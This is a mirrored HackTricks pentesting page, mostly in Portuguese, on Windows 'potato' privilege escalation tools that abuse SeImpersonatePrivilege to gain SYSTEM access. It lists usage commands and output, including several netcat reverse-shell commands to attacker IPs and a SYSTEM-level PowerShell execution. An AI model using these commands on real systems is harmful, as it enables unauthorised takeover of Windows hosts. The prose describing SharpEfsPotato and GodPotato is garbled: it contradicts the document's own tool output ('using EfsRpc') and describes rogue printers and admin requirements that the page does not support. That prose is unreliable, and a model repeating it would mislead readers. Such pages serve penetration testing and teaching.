mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 20:43:29 +00:00
96 lines
7.8 KiB
Markdown
96 lines
7.8 KiB
Markdown
# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
{% hint style="warning" %}
|
|
**JuicyPotato não funciona** no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) podem ser usados para **aproveitar os mesmos privilégios e obter acesso de nível `NT AUTHORITY\SYSTEM`**. Esta [postagem no blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) aprofunda a ferramenta `PrintSpoofer`, que pode ser usada para abusar de privilégios de impersonação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
|
|
{% endhint %}
|
|
|
|
## Demonstração Rápida
|
|
|
|
### PrintSpoofer
|
|
```bash
|
|
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
[+] Found privilege: SeImpersonatePrivilege
|
|
|
|
[+] Named pipe listening...
|
|
|
|
[+] CreateProcessAsUser() OK
|
|
|
|
NULL
|
|
|
|
```
|
|
### RoguePotato
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
|
|
# In some old versions you need to use the "-f" param
|
|
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
|
|
```
|
|
{% endcode %}
|
|
|
|
### SharpEfsPotato
|
|
|
|
O SharpEfsPotato é uma ferramenta de escalonamento de privilégios local que explora uma vulnerabilidade no Windows para obter privilégios de administrador. Essa vulnerabilidade é conhecida como "RoguePotato" e explora uma falha no serviço de impressão do Windows.
|
|
|
|
O RoguePotato aproveita uma técnica chamada "PrintSpoofer" para injetar um payload malicioso no serviço de impressão do Windows. Esse payload é então executado com privilégios de sistema, permitindo que o atacante obtenha controle total sobre o sistema comprometido.
|
|
|
|
O SharpEfsPotato automatiza o processo de exploração do RoguePotato, facilitando o escalonamento de privilégios local em sistemas Windows vulneráveis. Ele pode ser usado por hackers éticos durante testes de penetração para identificar e corrigir vulnerabilidades de segurança em sistemas Windows.
|
|
```
|
|
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
|
|
SharpEfsPotato by @bugch3ck
|
|
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
|
|
|
|
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
|
|
|
|
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
|
|
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
|
|
[x]RpcBindingSetAuthInfo failed with status 0x6d3
|
|
[+] Server connected to our evil RPC pipe
|
|
[+] Duplicated impersonation token ready for process creation
|
|
[+] Intercepted and authenticated successfully, launching program
|
|
[+] Process created, enjoy!
|
|
|
|
C:\temp>type C:\temp\w.log
|
|
nt authority\system
|
|
```
|
|
### GodPotato
|
|
|
|
GodPotato is a tool that combines the power of RoguePotato and PrintSpoofer to achieve local privilege escalation on Windows systems. It takes advantage of the Windows Print Spooler service and the impersonation capabilities of the Windows COM objects to execute arbitrary code with SYSTEM privileges.
|
|
|
|
To use GodPotato, you need to have administrative privileges on the target system. The tool works by creating a rogue printer and then exploiting the Print Spooler service to execute a malicious payload. This payload is executed as the SYSTEM user, which has the highest level of privileges on a Windows system.
|
|
|
|
The first step is to set up the rogue printer using RoguePotato. This involves creating a COM object and configuring it to impersonate the SYSTEM user. Once the rogue printer is set up, you can use PrintSpoofer to exploit the Print Spooler service and execute your payload.
|
|
|
|
GodPotato provides a simple command-line interface to automate the process. You can specify the command to be executed as the payload and GodPotato will take care of setting up the rogue printer and exploiting the Print Spooler service.
|
|
|
|
It is important to note that GodPotato is a powerful tool that can be used for both legitimate purposes, such as penetration testing, and malicious activities. It is essential to use this tool responsibly and only on systems that you have proper authorization to test.
|
|
```
|
|
GodPotato -cmd "cmd /c whoami"
|
|
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|